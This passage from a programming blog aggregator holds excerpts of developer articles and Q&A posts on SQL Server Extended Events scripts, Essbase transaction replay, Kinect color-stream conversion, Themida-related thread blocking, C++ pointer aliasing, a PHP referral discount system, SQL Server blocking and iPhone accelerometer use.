these earlier blogs. SPARC T4 OpenSSL Engine by myself, Dan Anderson (2011), discusses the Openssl T4 engine and reviews the SPARC T4 processor for the Solaris 11 release. Exciting Crypto Advances with the T4 processor and Oracle Solaris 11 by Valerie Fenwick (2011) discusses crypto algorithms that were optimized for the T4 processor with the Solaris 11 FCS (11/11) and Solaris 10 08/11 (U10) release. T4 Crypto Cheat Sheet by Stefan Hinker (2012) discusses how to make T4 crypto optimization available to various consumers (such as SSH, Java, OpenSSL, Apache, etc.) High Performance Security For Oracle Database and Fusion Middleware Applications using SPARC T4 (PDF, 2012) discusses SPARC T4 and its usage to optimize application security. Configuring Oracle iPlanet WebServer / Oracle Traffic Director to use crypto accelerators on T4-1 servers by Meena Vyas (2012)

Read the article
Working With Extended Events

- by Fatherjack

SQL Server 2012 has made working with Extended Events (XE) pretty simple when it comes to what sessions you have on your servers and what options you have selected and so forth but if you are like me then you still have some SQL Server instances that are 2008 or 2008 R2. For those servers there is no built-in way to view the Extended Event sessions in SSMS. I keep coming up against the same situations – Where are the xel log files? What events, actions or predicates are set for the events on the server? What sessions are there on the server already? I got tired of this being a perpetual question and wrote some TSQL to save as a snippet in SQL Prompt so that these details are permanently only a couple of clicks away. First, some history. If you just came here for the code skip down a few paragraphs and it’s all there. If you want a little time to reminisce about SQL Server then stick with me through the next paragraph or two. We are in a bit of a cross-over period currently, there are many versions of SQL Server but I would guess that SQL Server 2008, 2008 R2 and 2012 comprise the majority of installations. With each of these comes a set of management tools, of which SQL Server Management Studio (SSMS) is one. In 2008 and 2008 R2 Extended Events made their first appearance and there was no way to work with them in the SSMS interface. At some point the Extended Events guru Jonathan Kehayias (http://www.sqlskills.com/blogs/jonathan/) created the SQL Server 2008 Extended Events SSMS Addin which is really an excellent tool to ease XE session administration. This addin will install in SSMS 2008 or 2008R2 but not SSMS 2012. If you use a compatible version of SSMS then I wholly recommend downloading and using it to make your work with XE much easier. If you have SSMS 2012 installed, and there is no reason not to as it will let you work with all versions of SQL Server, then you cannot install this addin. If you are working with SQL Server 2012 then SSMS 2012 has built in functionality to manage XE sessions – this functionality does not apply for 2008 or 2008 R2 instances though. This means you are somewhat restricted and have to use TSQL to manage XE sessions on older versions of SQL Server. OK, those of you that skipped ahead for the code, you need to start from here: So, you are working with SSMS 2012 but have a SQL Server that is an earlier version that needs an XE session created or you think there is a session created but you aren’t sure, or you know it’s there but can’t remember if it is running and where the output is going. How do you find out? Well, none of the information is hidden as such but it is a bit of a wrangle to locate it and it isn’t a lot of code that is unlikely to remain in your memory. I have created two pieces of code. The first examines the SYS.Server_Event_… management views in combination with the SYS.DM_XE_… management views to give the name of all sessions that exist on the server, regardless of whether they are running or not and two pieces of TSQL code. One piece will alter the state of the session: if the session is running then the code will stop the session if executed and vice versa. The other piece of code will drop the selected session. If the session is running then the code will stop it first. Do not execute the DROP code unless you are sure you have the Create code to hand. It will be dropped from the server without a second chance to change your mind. /**************************************************************/ /*** To locate and describe event sessions on a server ***/ /*** ***/ /*** Generates TSQL to start/stop/drop sessions ***/ /*** ***/ /*** Jonathan Allen - @fatherjack ***/ /*** June 2013 ***/ /*** ***/ /**************************************************************/ SELECT [EES].[name] AS [Session Name - all sessions] , CASE WHEN [MXS].[name] IS NULL THEN ISNULL([MXS].[name], 'Stopped') ELSE 'Running' END AS SessionState , CASE WHEN [MXS].[name] IS NULL THEN ISNULL([MXS].[name], 'ALTER EVENT SESSION [' + [EES].[name] + '] ON SERVER STATE = START;') ELSE 'ALTER EVENT SESSION [' + [EES].[name] + '] ON SERVER STATE = STOP;' END AS ALTER_SessionState , CASE WHEN [MXS].[name] IS NULL THEN ISNULL([MXS].[name], 'DROP EVENT SESSION [' + [EES].[name] + '] ON SERVER; -- This WILL drop the session. It will no longer exist. Don't do it unless you are certain you can recreate it if you need it.') ELSE 'ALTER EVENT SESSION [' + [EES].[name] + '] ON SERVER STATE = STOP; ' + CHAR(10) + '-- DROP EVENT SESSION [' + [EES].[name] + '] ON SERVER; -- This WILL stop and drop the session. It will no longer exist. Don't do it unless you are certain you can recreate it if you need it.' END AS DROP_Session FROM [sys].[server_event_sessions] AS EES LEFT JOIN [sys].[dm_xe_sessions] AS MXS ON [EES].[name] = [MXS].[name] WHERE [EES].[name] NOT IN ( 'system_health', 'AlwaysOn_health' ) ORDER BY SessionState GO I have excluded the system_health and AlwaysOn sessions as I don’t want to accidentally execute the drop script for these sessions that are created as part of the SQL Server installation. It is possible to recreate the sessions but that is a whole lot of aggravation I’d rather avoid. The second piece of code gathers details of running XE sessions only and provides information on the Events being collected, any predicates that are set on those events, the actions that are set to be collected, where the collected information is being logged and if that logging is to a file target, where that file is located. /**********************************************/ /*** Running Session summary ***/ /*** ***/ /*** Details key values of XE sessions ***/ /*** that are in a running state ***/ /*** ***/ /*** Jonathan Allen - @fatherjack ***/ /*** June 2013 ***/ /*** ***/ /**********************************************/ SELECT [EES].[name] AS [Session Name - running sessions] , [EESE].[name] AS [Event Name] , COALESCE([EESE].[predicate], 'unfiltered') AS [Event Predicate Filter(s)] , [EESA].[Action] AS [Event Action(s)] , [EEST].[Target] AS [Session Target(s)] , ISNULL([EESF].[value], 'No file target in use') AS [File_Target_UNC] -- select * FROM [sys].[server_event_sessions] AS EES INNER JOIN [sys].[dm_xe_sessions] AS MXS ON [EES].[name] = [MXS].[name] INNER JOIN [sys].[server_event_session_events] AS [EESE] ON [EES].[event_session_id] = [EESE].[event_session_id] LEFT JOIN [sys].[server_event_session_fields] AS EESF ON ( [EES].[event_session_id] = [EESF].[event_session_id] AND [EESF].[name] = 'filename' ) CROSS APPLY ( SELECT STUFF(( SELECT ', ' + sest.name FROM [sys].[server_event_session_targets] AS SEST WHERE [EES].[event_session_id] = [SEST].[event_session_id] FOR XML PATH('') ), 1, 2, '') AS [Target] ) AS EEST CROSS APPLY ( SELECT STUFF(( SELECT ', ' + [sesa].NAME FROM [sys].[server_event_session_actions] AS sesa WHERE [sesa].[event_session_id] = [EES].[event_session_id] FOR XML PATH('') ), 1, 2, '') AS [Action] ) AS EESA WHERE [EES].[name] NOT IN ( 'system_health', 'AlwaysOn_health' ) /*Optional to exclude 'out-of-the-box' traces*/ I hope that these scripts are useful to you and I would be obliged if you would keep my name in the script comments. I have no problem with you using it in production or personal circumstances, however it has no warranty or guarantee. Don’t use it unless you understand it and are happy with what it is going to do. I am not ever responsible for the consequences of executing this script on your servers.

Read the article
New ways for backup, recovery and restore of Essbase Block Storage databases – part 2 by Bernhard Kinkel

- by Alexandra Georgescu

After discussing in the first part of this article new options in Essbase for the general backup and restore, this second part will deal with the also rather new feature of Transaction Logging and Replay, which was released in version 11.1, enhancing existing restore options. Tip: Transaction logging and replay cannot be used for aggregate storage databases. Please refer to the Oracle Hyperion Enterprise Performance Management System Backup and Recovery Guide (rel. 11.1.2.1). Even if backups are done on a regular, frequent base, subsequent data entries, loads or calculations would not be reflected in a restored database. Activating Transaction Logging could fill that gap and provides you with an option to capture these post-backup transactions for later replay. The following table shows, which are the transactions that could be logged when Transaction Logging is enabled: In order to activate its usage, corresponding statements could be added to the Essbase.cfg file, using the TRANSACTIONLOGLOCATION command. The complete syntax reads: TRANSACTIONLOGLOCATION [ appname [ dbname]] LOGLOCATION NATIVE ?ENABLE | DISABLE Where appname and dbname are optional parameters giving you the chance in combination with the ENABLE or DISABLE command to set Transaction Logging for certain applications or databases or to exclude them from being logged. If only an appname is specified, the setting applies to all databases in that particular application. If appname and dbname are not defined, all applications and databases would be covered. LOGLOCATION specifies the directory to which the log is written, e.g. D:\temp\trlogs. This directory must already exist or needs to be created before using it for log information being written to it. NATIVE is a reserved keyword that shouldn’t be changed. The following example shows how to first enable logging on a more general level for all databases in the application Sample, followed by a disabling statement on a more granular level for only the Basic database in application Sample, hence excluding it from being logged. TRANSACTIONLOGLOCATION Sample Hyperion/trlog/Sample NATIVE ENABLE TRANSACTIONLOGLOCATION Sample Basic Hyperion/trlog/Sample NATIVE DISABLE Tip: After applying changes to the configuration file you must restart the Essbase server in order to initialize the settings. A maybe required replay of logged transactions after restoring a database can be done only by administrators. The following options are available: In Administration Services selecting Replay Transactions on the right-click menu on the database: Here you can select to replay transactions logged after the last replay request was originally executed or after the time of the last restored backup (whichever occurred later) or transactions logged after a specified time. Or you can replay transactions selectively based on a range of sequence IDs, which can be accessed using Display Transactions on the right-click menu on the database: These sequence ID s (0, 1, 2 … 7 in the screenshot below) are assigned to each logged transaction, indicating the order in which the transaction was performed. This helps to ensure the integrity of the restored data after a replay, as the replay of transactions is enforced in the same order in which they were originally performed. So for example a calculation originally run after a data load cannot be replayed before having replayed the data load first. After a transaction is replayed, you can replay only transactions with a greater sequence ID. For example, replaying the transaction with sequence ID of 4 includes all preceding transactions, while afterwards you can only replay transactions with a sequence ID of 5 or greater. Tip: After restoring a database from a backup you should always completely replay all logged transactions, which were executed after the backup, before executing new transactions. But not only the transaction information itself needs to be logged and stored in a specified directory as described above. During transaction logging, Essbase also creates archive copies of data load and rules files in the following default directory: ARBORPATH/app/appname/dbname/Replay These files are then used during the replay of a logged transaction. By default Essbase archives only data load and rules files for client data loads, but in order to specify the type of data to archive when logging transactions you can use the command TRANSACTIONLOGDATALOADARCHIVE as an additional entry in the Essbase.cfg file. The syntax for the statement is: TRANSACTIONLOGDATALOADARCHIVE [appname [dbname]] [OPTION] While to the [appname [dbname]] argument the same applies like before for TRANSACTIONLOGLOCATION, the valid values for the OPTION argument are the following: Make the respective setting for which files copies should be logged, considering from which location transactions are usually taking place. Selecting the NONE option prevents Essbase from saving the respective files and the data load cannot be replayed. In this case you must first manually load the data before you can replay the transactions. Tip: If you use server or SQL data and the data and rules files are not archived in the Replay directory (for example, you did not use the SERVER or SERVER_CLIENT option), Essbase replays the data that is actually in the data source at the moment of the replay, which may or may not be the data that was originally loaded. You can find more detailed information in the following documents: Oracle Hyperion Enterprise Performance Management System Backup and Recovery Guide (rel. 11.1.2.1) Oracle Essbase Online Documentation (rel. 11.1.2.1)) Enterprise Performance Management System Documentation (including previous releases) Or on the Oracle Technology Network. If you are also interested in other new features and smart enhancements in Essbase or Hyperion Planning stay tuned for coming articles or check our training courses and web presentations. You can find general information about offerings for the Essbase and Planning curriculum or other Oracle-Hyperion products here; (please make sure to select your country/region at the top of this page) or in the OU Learning paths section, where Planning, Essbase and other Hyperion products can be found under the Fusion Middleware heading (again, please select the right country/region). Or drop me a note directly: [email protected]. About the Author: Bernhard Kinkel started working for Hyperion Solutions as a Presales Consultant and Consultant in 1998 and moved to Hyperion Education Services in 1999. He joined Oracle University in 2007 where he is a Principal Education Consultant. Based on these many years of working with Hyperion products he has detailed product knowledge across several versions. He delivers both classroom and live virtual courses. His areas of expertise are Oracle/Hyperion Essbase, Oracle Hyperion Planning and Hyperion Web Analysis. Disclaimer: All methods and features mentioned in this article must be considered and tested carefully related to your environment, processes and requirements. As guidance please always refer to the available software documentation. This article does not recommend or advise any explicit action or change, hence the author cannot be held responsible for any consequences due to the use or implementation of these features.

Read the article
Processing Kinect v2 Color Streams in Parallel

- by Chris Gardner

Originally posted on: http://geekswithblogs.net/freestylecoding/archive/2014/08/20/processing-kinect-v2-color-streams-in-parallel.aspxProcessing Kinect v2 Color Streams in Parallel I've really been enjoying being a part of the Kinect for Windows Developer's Preview. The new hardware has some really impressive capabilities. However, with great power comes great system specs. Unfortunately, my little laptop that could is not 100% up to the task; I've had to get a little creative. The most disappointing thing I've run into is that I can't always cleanly display the color camera stream in managed code. I managed to strip the code down to what I believe is the bear minimum: using( ColorFrame _ColorFrame = e.FrameReference.AcquireFrame() ) { if( null == _ColorFrame ) return; BitmapToDisplay.Lock(); _ColorFrame.CopyConvertedFrameDataToIntPtr( BitmapToDisplay.BackBuffer, Convert.ToUInt32( BitmapToDisplay.BackBufferStride * BitmapToDisplay.PixelHeight ), ColorImageFormat.Bgra ); BitmapToDisplay.AddDirtyRect( new Int32Rect( 0, 0, _ColorFrame.FrameDescription.Width, _ColorFrame.FrameDescription.Height ) ); BitmapToDisplay.Unlock(); } With this snippet, I'm placing the converted Bgra32 color stream directly on the BackBuffer of the WriteableBitmap. This gives me pretty smooth playback, but I still get the occasional freeze for half a second. After a bit of profiling, I discovered there were a few problems. The first problem is the size of the buffer along with the conversion on the buffer. At this time, the raw image format of the data from the Kinect is Yuy2. This is great for direct video processing. It would be ideal if I had a WriteableVideo object in WPF. However, this is not the case. Further digging led me to the real problem. It appears that the SDK is converting the input serially. Let's think about this for a second. The color camera is a 1080p camera. As we should all know, this give us a native resolution of 1920 x 1080. This produces 2,073,600 pixels. Yuy2 uses 4 bytes per 2 pixel, for a buffer size of 4,147,200 bytes. Bgra32 uses 4 bytes per pixel, for a buffer size of 8,294,400 bytes. The SDK appears to be doing this on one thread. I started wondering if I chould do this better myself. I mean, I have 8 cores in my system. Why can't I use them all? The first problem is converting a Yuy2 frame into a Bgra32 frame. It is NOT trivial. I spent a day of research of just how to do this. In the end, I didn't even produce the best algorithm possible, but it did work. After I managed to get that to work, I knew my next step was the get the conversion operation off the UI Thread. This was a simple process of throwing the work into a Task. Of course, this meant I had to marshal the final write to the WriteableBitmap back to the UI thread. Finally, I needed to vectorize the operation so I could run it safely in parallel. This was, mercifully, not quite as hard as I thought it would be. I had my loop return an index to a pair of pixels. From there, I had to tell the loop to do everything for this pair of pixels. If you're wondering why I did it for pairs of pixels, look back above at the specification for the Yuy2 format. I won't go into full detail on why each 4 bytes contains 2 pixels of information, but rest assured that there is a reason why the format is described in that way. The first working attempt at this algorithm successfully turned my poor laptop into a space heater. I very quickly brought and maintained all 8 cores up to about 97% usage. That's when I remembered that obscure option in the Task Parallel Library where you could limit the amount of parallelism used. After a little trial and error, I discovered 4 parallel tasks was enough for most cases. This yielded the follow code: private byte ClipToByte( int p_ValueToClip ) { return Convert.ToByte( ( p_ValueToClip < byte.MinValue ) ? byte.MinValue : ( ( p_ValueToClip > byte.MaxValue ) ? byte.MaxValue : p_ValueToClip ) ); } private void ColorFrameArrived( object sender, ColorFrameArrivedEventArgs e ) { if( null == e.FrameReference ) return; // If you do not dispose of the frame, you never get another one... using( ColorFrame _ColorFrame = e.FrameReference.AcquireFrame() ) { if( null == _ColorFrame ) return; byte[] _InputImage = new byte[_ColorFrame.FrameDescription.LengthInPixels * _ColorFrame.FrameDescription.BytesPerPixel]; byte[] _OutputImage = new byte[BitmapToDisplay.BackBufferStride * BitmapToDisplay.PixelHeight]; _ColorFrame.CopyRawFrameDataToArray( _InputImage ); Task.Factory.StartNew( () => { ParallelOptions _ParallelOptions = new ParallelOptions(); _ParallelOptions.MaxDegreeOfParallelism = 4; Parallel.For( 0, Sensor.ColorFrameSource.FrameDescription.LengthInPixels / 2, _ParallelOptions, ( _Index ) => { // See http://msdn.microsoft.com/en-us/library/windows/desktop/dd206750(v=vs.85).aspx int _Y0 = _InputImage[( _Index << 2 ) + 0] - 16; int _U = _InputImage[( _Index << 2 ) + 1] - 128; int _Y1 = _InputImage[( _Index << 2 ) + 2] - 16; int _V = _InputImage[( _Index << 2 ) + 3] - 128; byte _R = ClipToByte( ( 298 * _Y0 + 409 * _V + 128 ) >> 8 ); byte _G = ClipToByte( ( 298 * _Y0 - 100 * _U - 208 * _V + 128 ) >> 8 ); byte _B = ClipToByte( ( 298 * _Y0 + 516 * _U + 128 ) >> 8 ); _OutputImage[( _Index << 3 ) + 0] = _B; _OutputImage[( _Index << 3 ) + 1] = _G; _OutputImage[( _Index << 3 ) + 2] = _R; _OutputImage[( _Index << 3 ) + 3] = 0xFF; // A _R = ClipToByte( ( 298 * _Y1 + 409 * _V + 128 ) >> 8 ); _G = ClipToByte( ( 298 * _Y1 - 100 * _U - 208 * _V + 128 ) >> 8 ); _B = ClipToByte( ( 298 * _Y1 + 516 * _U + 128 ) >> 8 ); _OutputImage[( _Index << 3 ) + 4] = _B; _OutputImage[( _Index << 3 ) + 5] = _G; _OutputImage[( _Index << 3 ) + 6] = _R; _OutputImage[( _Index << 3 ) + 7] = 0xFF; } ); Application.Current.Dispatcher.Invoke( () => { BitmapToDisplay.WritePixels( new Int32Rect( 0, 0, Sensor.ColorFrameSource.FrameDescription.Width, Sensor.ColorFrameSource.FrameDescription.Height ), _OutputImage, BitmapToDisplay.BackBufferStride, 0 ); } ); } ); } } This seemed to yield a results I wanted, but there was still the occasional stutter. This lead to what I realized was the second problem. There is a race condition between the UI Thread and me locking the WriteableBitmap so I can write the next frame. Again, I'm writing approximately 8MB to the back buffer. Then, I started thinking I could cheat. The Kinect is running at 30 frames per second. The WPF UI Thread runs at 60 frames per second. This made me not feel bad about exploiting the Composition Thread. I moved the bulk of the code from the FrameArrived handler into CompositionTarget.Rendering. Once I was in there, I polled from a frame, and rendered it if it existed. Since, in theory, I'm only killing the Composition Thread every other hit, I decided I was ok with this for cases where silky smooth video performance REALLY mattered. This ode looked like this: private byte ClipToByte( int p_ValueToClip ) { return Convert.ToByte( ( p_ValueToClip < byte.MinValue ) ? byte.MinValue : ( ( p_ValueToClip > byte.MaxValue ) ? byte.MaxValue : p_ValueToClip ) ); } void CompositionTarget_Rendering( object sender, EventArgs e ) { using( ColorFrame _ColorFrame = FrameReader.AcquireLatestFrame() ) { if( null == _ColorFrame ) return; byte[] _InputImage = new byte[_ColorFrame.FrameDescription.LengthInPixels * _ColorFrame.FrameDescription.BytesPerPixel]; byte[] _OutputImage = new byte[BitmapToDisplay.BackBufferStride * BitmapToDisplay.PixelHeight]; _ColorFrame.CopyRawFrameDataToArray( _InputImage ); ParallelOptions _ParallelOptions = new ParallelOptions(); _ParallelOptions.MaxDegreeOfParallelism = 4; Parallel.For( 0, Sensor.ColorFrameSource.FrameDescription.LengthInPixels / 2, _ParallelOptions, ( _Index ) => { // See http://msdn.microsoft.com/en-us/library/windows/desktop/dd206750(v=vs.85).aspx int _Y0 = _InputImage[( _Index << 2 ) + 0] - 16; int _U = _InputImage[( _Index << 2 ) + 1] - 128; int _Y1 = _InputImage[( _Index << 2 ) + 2] - 16; int _V = _InputImage[( _Index << 2 ) + 3] - 128; byte _R = ClipToByte( ( 298 * _Y0 + 409 * _V + 128 ) >> 8 ); byte _G = ClipToByte( ( 298 * _Y0 - 100 * _U - 208 * _V + 128 ) >> 8 ); byte _B = ClipToByte( ( 298 * _Y0 + 516 * _U + 128 ) >> 8 ); _OutputImage[( _Index << 3 ) + 0] = _B; _OutputImage[( _Index << 3 ) + 1] = _G; _OutputImage[( _Index << 3 ) + 2] = _R; _OutputImage[( _Index << 3 ) + 3] = 0xFF; // A _R = ClipToByte( ( 298 * _Y1 + 409 * _V + 128 ) >> 8 ); _G = ClipToByte( ( 298 * _Y1 - 100 * _U - 208 * _V + 128 ) >> 8 ); _B = ClipToByte( ( 298 * _Y1 + 516 * _U + 128 ) >> 8 ); _OutputImage[( _Index << 3 ) + 4] = _B; _OutputImage[( _Index << 3 ) + 5] = _G; _OutputImage[( _Index << 3 ) + 6] = _R; _OutputImage[( _Index << 3 ) + 7] = 0xFF; } ); BitmapToDisplay.WritePixels( new Int32Rect( 0, 0, Sensor.ColorFrameSource.FrameDescription.Width, Sensor.ColorFrameSource.FrameDescription.Height ), _OutputImage, BitmapToDisplay.BackBufferStride, 0 ); } }

Read the article
Multi-threaded .NET application blocks during file I/O when protected by Themida

- by Erik Jensen

As the title says I have a .NET application that is the GUI which uses multiple threads to perform separate file I/O and notice that the threads occasionally block when the application is protected by Themida. One thread is devoted to reading from serial COM port and another thread is devoted to copying files. What I experience is occasionally when the file copy thread encounters a network delay, it will block the other thread that is reading from the serial port. In addition to slow network (which can be transient), I can cause the problem to happen more frequently by making a PathFileExists call to a bad path e.g. PathFileExists("\\\\BadPath\\file.txt"); The COM port reading function will block during the call to ReadFile. This only happens when the application is protected by Themida. I have tried under WinXP, Win7, and Server 2012. In a streamlined test project, if I replace the .NET application with a MFC unmanaged application and still utilize the same threads I see no issue even when protected with Themida. I have contacted Oreans support and here is their response: The way that a .NET application is protected is very different from a native application. To protect a .NET application, we need to hook most of the file access APIs in order to "cheat" the .NET Framework that the application is protected. I guess that those special hooks (on CreateFile, ReadFile...) are delaying a bit the execution in your application and the problem appears. We did a test making those hooks as light as possible (with minimum code on them) but the problem still appeared in your application. The rest of software protectors that we tried (like Enigma, Molebox...) also use a similar hooking approach as it's the only way to make the .NET packed file to work. If those hooks are not present, the .NET Framework will abort execution as it will see that the original file was tampered (due to all Microsoft checks on .NET files) Those hooks are not present in a native application, that's why it should be working fine on your native application. Oreans support tried other software protectors such as Enigma Protector, Engima VirtualBox, and Molebox and all exhibit the exact same problem. What I have found as a work around is to separate out the file copy logic (where the file exists call is being made) to be performed in a completely separate process. I have experimented with converting the thread functions from unmanaged C++ to VB.NET equivalents (PathFileExists - System.IO.File.Exists and CreateFile/ReadFile - System.IO.Ports.SerialPort.Open/Read) and still see the same serial port read blocked when the file check or copy call is delayed. I have also tried setting the ReadFile to work asynchronously but that had no effect. I believe I am dealing with some low-level windows layer that no matter the language it exhibits a block on a shared resource -- and only when the application is executing under a single .NET process protected by Themida which evidently installs some hooks to allow .NET execution. At this time converting the entire application away from .NET is not an option. Nor is separating out the file copy logic to a separate task. I am wondering if anyone else has more knowledge of how a file operation can block another thread reading from a system port. I have included here example applications that show the problem: https://db.tt/cNMYfEIg - VB.NET https://db.tt/Y2lnTqw7 - MFC They are Visual Studio 2010 solutions. When running the themida protected exe, you can see when the FileThread counter pauses (executing the File.Exists call) while the ReadThread counter also pauses. When running non-protected visual studio output exe, the ReadThread counter does not pause which is how we expect it to function. Thanks!

Read the article
Make interchangeable class types via pointer casting only, without having to allocate any new objects?

- by HostileFork

UPDATE: I do appreciate "don't want that, want this instead" suggestions. They are useful, especially when provided in context of the motivating scenario. Still...regardless of goodness/badness, I've become curious to find a hard-and-fast "yes that can be done legally in C++11" vs "no it is not possible to do something like that". I want to "alias" an object pointer as another type, for the sole purpose of adding some helper methods. The alias cannot add data members to the underlying class (in fact, the more I can prevent that from happening the better!) All aliases are equally applicable to any object of this type...it's just helpful if the type system can hint which alias is likely the most appropriate. There should be no information about any specific alias that is ever encoded in the underlying object. Hence, I feel like you should be able to "cheat" the type system and just let it be an annotation...checked at compile time, but ultimately irrelevant to the runtime casting. Something along these lines: Node<AccessorFoo>* fooPtr = Node<AccessorFoo>::createViaFactory(); Node<AccessorBar>* barPtr = reinterpret_cast< Node<AccessorBar>* >(fooPtr); Under the hood, the factory method is actually making a NodeBase class, and then using a similar reinterpret_cast to return it as a Node<AccessorFoo>*. The easy way to avoid this is to make these lightweight classes that wrap nodes and are passed around by value. Thus you don't need casting, just Accessor classes that take the node handle to wrap in their constructor: AccessorFoo foo (NodeBase::createViaFactory()); AccessorBar bar (foo.getNode()); But if I don't have to pay for all that, I don't want to. That would involve--for instance--making a special accessor type for each sort of wrapped pointer (AccessorFooShared, AccessorFooUnique, AccessorFooWeak, etc.) Having these typed pointers being aliased for one single pointer-based object identity is preferable, and provides a nice orthogonality. So back to that original question: Node<AccessorFoo>* fooPtr = Node<AccessorFoo>::createViaFactory(); Node<AccessorBar>* barPtr = reinterpret_cast< Node<AccessorBar>* >(fooPtr); Seems like there would be some way to do this that might be ugly but not "break the rules". According to ISO14882:2011(e) 5.2.10-7: An object pointer can be explicitly converted to an object pointer of a different type.70 When a prvalue v of type "pointer to T1" is converted to the type "pointer to cv T2", the result is static_cast(static_cast(v)) if both T1 and T2 are standard-layout types (3.9) and the alignment requirements of T2 are no stricter than those of T1, or if either type is void. Converting a prvalue of type "pointer to T1" to the type "pointer to T2" (where T1 and T2 are object types and where the alignment requirements of T2 are no stricter than those of T1) and back to its original type yields the original pointer value. The result of any other such pointer conversion is unspecified. Drilling into the definition of a "standard-layout class", we find: has no non-static data members of type non-standard-layout-class (or array of such types) or reference, and has no virtual functions (10.3) and no virtual base classes (10.1), and has the same access control (clause 11) for all non-static data members, and has no non-standard-layout base classes, and either has no non-static data member in the most-derived class and at most one base class with non-static data members, or has no base classes with non-static data members, and has no base classes of the same type as the first non-static data member. Sounds like working with something like this would tie my hands a bit with no virtual methods in the accessors or the node. Yet C++11 apparently has std::is_standard_layout to keep things checked. Can this be done safely? Appears to work in gcc-4.7, but I'd like to be sure I'm not invoking undefined behavior.

Read the article
Infinite sharing system (PHP/MySQLi)

- by Toine Lille

I'm working on a discount system for whichever customer shares a product and brings in new customers. Each unique visit = $0.05 off, each new customer = $0.50 off (it's a cheap product so yeah, no big numbers). When a new customer shares the site, the customer initially responsible for the new customer (if any) will get half of the new customer's discount as well. The initial customer would get a fourth for the next level and the new customer half of that, etc, creating a tree or pyramid that way that could be infinite. Initial customer ($1.35 discount: 2 new+3 visits + half of 1 new+2 visits) Visitor ($0) Visitor ($0) New customer ($0.60) Visitor ($0) Visitor ($0) Newer customer ($0) New customer ($0) Visitor ($0) The customers are saved along with their IP addresses (bin2hex(inet_pton)) in a database table (customers) with info like a unique id, e-mail address and first date/time the purchased a product (= time of registration). The shares are saved in a separate table within the same database (sharing). Each unique IP addresses that visits the site creates a new row featuring the IP address (also saved as bin2hex(inet_pton)), the id of the customer who shared it and the date/time of the visit. Sharing goes via URL, featuring a GET element containing the customer's id. Visits and new customers overlap, as visits will always occur before the new customer does. That's fine. The date/times are used just to make it a little more secure (I also use the IP along with cookies to see if people cheat the system). If an IP is already in the sharing or customer tables, it does not count and will not create a new entry. Now the problem is, how to make the infinity happen and apply the different values to it? That's all I'd need to know. It needs to calculate the discount for each customer separately, but also allow for monitoring altogether (though that's just a matter of passing all ID's through it). I figured I'd start (after the database connection) with $stmt = $con->prepare('SELECT ip,datetime FROM sharing WHERE sender=?'); $stmt->bind_param('i',$customerid); $stmt->execute(); $stmt->store_result(); $discount = $discount + ($stmt->num_rows * 0.05); $stmt->bind_result($ip,$timeofsharing); to translate all the visits to $0.05 of discount each. To check for the new customers that came from these visits, I wrote the following: while ($sql->fetch()) { $stmt2 = $con->prepare("SELECT datetime FROM users WHERE ip=?"); $stmt2->bind_param('s',$ip); $stmt2->execute(); $stmt2->store_result(); $stmt2->bind_result($timeofpurchase); Followed by a little more security comparing the datetimes: while ($stmt2->fetch()) { if (strtotime($timeofpurchase) < strtotime($timeofsharing)) { $discount = $discount + $0.50; } But this is just for the initial customer's direct results. If I'd want to check for the next level, I'd basically have to put the exact same check and loop in itself, checking each new customer the initial customer they brought to the site, and then for the next level again to check all of the newer customers, etc, etc. What to do? / Where to go? / What would be the correct practice for this? Thanks!

Read the article
SQL Server 2005 Blocking Problem (ASYNC_NETWORK_IO)

- by ivankolo

I am responsible for a third-party application (no access to source) running on IIS and SQL Server 2005 (500 concurrent users, 1TB data, 8 IIS servers). We have recently started to see significant blocking on the database (after months of running this application in production with no problems). This occurs at random intervals during the day, approximately every 30 minutes, and affects between 20 and 100 sessions each time. All of the sessions eventually hit the application time out and the sessions abort. The problem disappears and then gradually re-emerges. The SPID responsible for the blocking always has the following features: WAIT TYPE = ASYNC_NETWORK_IO The SQL being run is “(@claimid varchar(15))SELECT claimid, enrollid, status, orgclaimid, resubclaimid, primaryclaimid FROM claim WHERE primaryclaimid = @claimid AND primaryclaimid < claimid)”. This is relatively innocuous SQL that should only return one or two records, not a large dataset. NO OTHER SQL statements have been implicated in the blocking, only this SQL statement. This is parameterized SQL for which an execution plan is cached in sys.dm_exec_cached_plans. This SPID has an object-level S lock on the claim table, so all UPDATEs/INSERTs to the claim table are also blocked. HOST ID varies. Different web servers are responsible for the blocking sessions. E.g., sometimes we trace back to web server 1, sometimes web server 2. When we trace back to the web server implicated in the blocking, we see the following: There is always some sort of application related error in the Event Log on the web server, linked to the Host ID and Host Process ID from the SQL Session. The error messages vary, usually some sort of SystemOutofMemory. (These error messages seem to be similar to error messages that we have seen in the past without such dramatic consequences. We think was happening before, but didn’t lead to blocking. Why now?) No known problems with the network adapters on either the web servers or the SQL server. (In any event the record set returned by the offending query would be small.) Things ruled out: Indexes are regularly defragmented. Statistics regularly updated. Increased sample size of statistics on claim.primaryclaimid. Forced recompilation of the cached execution plan. Created a compound index with primaryclaimid, claimid. No networking problems. No known issues on the web server. No changes to application software on web servers. We hypothesize that the chain of events goes something like this: Web server process submits SQL above. SQL server executes the SQL, during which it acquires a lock on the claim table. Web server process gets an error and dies. SQL server session is hung waiting for the web server process to read the data set. SQL Server sessions that need to get X locks on parts of the claim table (anyone processing claims) are blocked by the lock on the claim table and remain blocked until they all hit the application time out. Any suggestions for troubleshooting while waiting for the vendor's assistance would be most welcome. Is there a way to force SQL Server to lock at the row/page level for this particular SQL statement only? Is there a way to set a threshold on ASYNC_NETWORK_IO waits only?

Read the article
Detecting Acceleration in a car (iPhone Accelerometer)

- by TheGazzardian

Hello, I am working on an iPhone app where we are trying to calculate the acceleration of a moving car. Similar apps have accomplished this (Dynolicious), but the difference is that this app is designed to be used during general city driving, not on a drag strip. This leads us to one big concern that Dynolicious was luckily able to avoid: hills. Yes, hills. There are two important stages to this: calibration, and actual driving. Our initial run was simple and suffered the consequences. During the calibration stage, I took the average force on the phone, and during running, I just subtracted the average force from the current force to get the current acceleration this frame. The problem with this is that the typical car receives much more force than just the forward force - everything from turning to potholes was causing the values to go out of sync with what was really happening. The next run was to add the condition that the iPhone must be oriented in such a way that the screen was facing toward the back of the car. Using this method, I attempted to follow only force on the z-axis, but this obviously lead to problems unless the iPhone was oriented directly upright, because of gravity. Some trigonometry later, and I had managed to work gravity out of the equation, so that the car was actually being read very, very well by the iPhone. Until I hit a slope. As soon as the angle of the car changed, suddenly I was receiving accelerations and decelerations that didn't make sense, and we were once again going out of sync. Talking with someone a lot smarter than me at math lead to a solution that I have been trying to implement for longer than I would like to admit. It's steps are as follows: 1) During calibration, measure gravity as a vector instead of a size. Store that vector. 2) When the car initially moves forward, take the vector of motion and 